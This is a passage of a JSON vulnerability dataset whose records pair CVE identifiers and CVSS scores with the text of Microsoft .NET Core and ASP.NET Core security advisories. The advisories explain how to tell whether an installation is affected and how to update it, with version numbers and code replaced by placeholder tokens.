Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG installed, you need to install the updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Soroush Dalili ( MENTIONTAG URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87629. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87630. "severity": "HIGH",
  87631. "baseScore": 8.8,
  87632. "impactScore": 5.9,
  87633. "exploitabilityScore": 2.8
  87634. },
  87635. {
  87636. "CVE_ID": "CVE-2018-0875",
  87637. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/62",
  87638. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/62",
  87639. "Repo_new": "dotnet/announcements",
  87640. "Issue_Created_At": "2018-03-13T17:01:52Z",
  87641. "description": "Microsoft Security Advisory CVETAG : Hash Collison can cause Denial of Service. Microsoft Security Advisory CVETAG : Hash Collison can cause Denial of Service Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG including other minor and patch releases). This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public versions of .NET Core where a malicious file or web request could cause a denial of service APITAG attack. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG or NUMBERTAG Developers are advised to update their .NET Core SDK to versions NUMBERTAG or NUMBERTAG Discussion Use TBD for discussion of this advisory. Mitigation Factors None Affected Software Any application running against .NET Core NUMBERTAG or lower versions NUMBERTAG or lower minor versions or NUMBERTAG or lower minor versions is affected. Advisory FAQ How do I know if I am affected? Any application running against .NET Core NUMBERTAG or lower versions NUMBERTAG or lower minor versions or NUMBERTAG or lower minor versions is affected. A complete list of runtimes can be discovered by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG | | APITAG | APITAG | | Supported Linux platforms | APITAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG and NUMBERTAG then any applications targeting the respective major/minor versions NUMBERTAG or NUMBERTAG or NUMBERTAG of .NET Core are vulnerable. Additionally, if you've deployed self contained applications targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. How do I fix my affected application? Applications can be fixed by installing the latest .NET Core runtimes or SDKs. Typically, application servers only have runtime packages installed and developer machines have the SDKs installed. Installers for the runtimes can be downloaded from the FILETAG . .NET Core NUMBERTAG SDK installs both versions NUMBERTAG and NUMBERTAG of the .NET Core runtime. If you've built a self contained application, you must install the new runtime and SDK, recompile your application and redeploy. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the ERRORTAG file for that application. Set the framework version to the desired version and the APITAG property to false. These settings should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Since the ERRORTAG file is an optional file, you may need to create one for each application and add it alongside the executable. Acknowledgments Ben Adams URLTAG of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87642. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87643. "severity": "HIGH",
  87644. "baseScore": 7.5,
  87645. "impactScore": 3.6,
  87646. "exploitabilityScore": 3.9
  87647. },
  87648. {
  87649. "CVE_ID": "CVE-2019-0982",
  87650. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/359",
  87651. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/359",
  87652. "Repo_new": "aspnet/announcements",
  87653. "Issue_Created_At": "2019-05-14T17:00:32Z",
  87654. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any ASP.NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are also available separately as a APITAG package. If you are not using APITAG directly you may still be affected if you are using APITAG and the package is a transitive dependency. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87655. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87656. "severity": "HIGH",
  87657. "baseScore": 7.5,
  87658. "impactScore": 3.6,
  87659. "exploitabilityScore": 3.9
  87660. },
  87661. {
  87662. "CVE_ID": "CVE-2020-1161",
  87663. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/416",
  87664. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/416",
  87665. "Repo_new": "aspnet/announcements",
  87666. "Issue_Created_At": "2020-05-12T22:57:19Z",
  87667. "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability which exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87668. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87669. "severity": "HIGH",
  87670. "baseScore": 7.5,
  87671. "impactScore": 3.6,
  87672. "exploitabilityScore": 3.9
  87673. },
  87674. {
  87675. "CVE_ID": "CVE-2021-26423",
  87676. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/194",
  87677. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/194",
  87678. "Repo_new": "dotnet/announcements",
  87679. "Issue_Created_At": "2021-08-10T21:50:27Z",
  87680. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG where .NET APITAG server applications providing APITAG endpoints could be tricked into endlessly looping while trying to read a single APITAG frame. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87681. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87682. "severity": "HIGH",
  87683. "baseScore": 7.5,
  87684. "impactScore": 3.6,
  87685. "exploitabilityScore": 3.9
  87686. },
  87687. {
  87688. "CVE_ID": "CVE-2018-0786",
  87689. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/51",
  87690. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/51",
  87691. "Repo_new": "dotnet/announcements",
  87692. "Issue_Created_At": "2018-01-09T18:01:26Z",
  87693. "description": "Microsoft Security Advisory CVETAG : Security Feature Bypass in NUMBERTAG Certificate Validation. Microsoft Security Advisory CVETAG Security Feature Bypass in NUMBERTAG Certificate Validation Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public versions of .NET Core where an attacker could present a certificate that is marked invalid for a specific use, but a component uses it for that purpose. This action disregards the Enhanced Key Usage tagging. The security update addresses the vulnerability by ensuring that .NET Core components completely validate certificates. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG Developers are advised to update their .NET Core SDK to version NUMBERTAG or NUMBERTAG These runtime and SDK versions will also address CVETAG TODO: ADD LINK TO OTHER ISSUE Discussion Please use TODO: FILL IN ISSUE LINK for discussion of this advisory. Affected Software The vulnerability affects any Microsoft .NET Core project if it uses any of affected runtime versions listed below Runtime Version | Fixed runtime version NUMBERTAG This vulnerability also affects any .NET native applications using the following APITAG packages. APITAG Packages | Fixed APITAG Packages | APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG Advisory FAQ How do I know if I am affected? To check the runtimes installed on a computer you must view the contents of the runtime folder. By default these are | Operating System | Location | | | | | Windows | APITAG PATHTAG | | APITAG | PATHTAG | | Supported Linux platforms | PATHTAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you do not have a directory for NUMBERTAG or NUMBERTAG then any applications targeting .NET Core will be vulnerable. Downloads for all supported platforms can be acquired from URLTAG How do I fix my affected application? Applications can be fixed by installing the latest runtimes or SDKs. Typically application servers only install a runtime package, developer machines install SDKs. Installers can be downloaded from the FILETAG . Runtime version NUMBERTAG will also install runtime version NUMBERTAG If you have built a self contained application URLTAG you must install the new runtime and SDK, recompile your application and redeploy. How do I fix my .NET native application? .NET native requires that applications be re processed by the .NET native compiler to incorporate the fixes and the re processed version needs to be distributed via the Windows Store. We recommend that you update your .NET UWP apps to use the latest minor version of the ERRORTAG APITAG package so that you can build and verify that your app works as expected when updated. If you are using version NUMBERTAG you should update to NUMBERTAG and if you\u2019re using NUMBERTAG you can update to NUMBERTAG Of course, you can update to a higher major version too, but we are distributing security updates for all impacted major versions (currently NUMBERTAG and NUMBERTAG Additionally, whether or not you update your APITAG packages, all applications submitted to the store after today will be automatically fixed during submission processing. If you do not update your app in the Store, it will automatically be reprocessed and distributed via an application update in the next few weeks. Users who have automatic app updates enabled will get the fix with no intervention on your or their parts. Because updated apps are distributed through the Windows Store, sideloaded apps will not be automatically updated. We recommend that developers who distribute sideloaded apps update the affected APITAG packages, rebuild their applications and distribute them to their users. Microsoft is committed to keeping UWP applications secure and to supporting developers. If you have feedback on the fix distribution process, please let us know at EMAILTAG . Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including Terms and Conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue where you can ask questions. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the APITAG URLTAG file for that application and editing the framework version and setting APITAG to false . This should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Note that this file is optional, you may need to create it for each application alongside the executable. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87694. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87695. "severity": "HIGH",
  87696. "baseScore": 7.5,
  87697. "impactScore": 3.6,
  87698. "exploitabilityScore": 3.9
  87699. },
  87700. {
  87701. "CVE_ID": "CVE-2019-0545",
  87702. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/94",
  87703. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/94",
  87704. "Repo_new": "dotnet/announcements",
  87705. "Issue_Created_At": "2019-01-08T18:00:23Z",
  87706. "description": "Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of an information disclosure vulnerability exists in .NET Framework and .NET Core which allows bypassing Cross origin Resource Sharing (CORS) configurations. An attacker who successfully exploited the vulnerability could retrieve content, that is normally restricted, from a web application. The security update addresses the vulnerability by enforcing CORS configuration to prevent its bypass. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. Applications not using APITAG The affected assembly is also available separately as a APITAG package. If you are not using APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87707. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87708. "severity": "HIGH",
  87709. "baseScore": 7.5,
  87710. "impactScore": 3.6,
  87711. "exploitabilityScore": 3.9
  87712. },
  87713. {
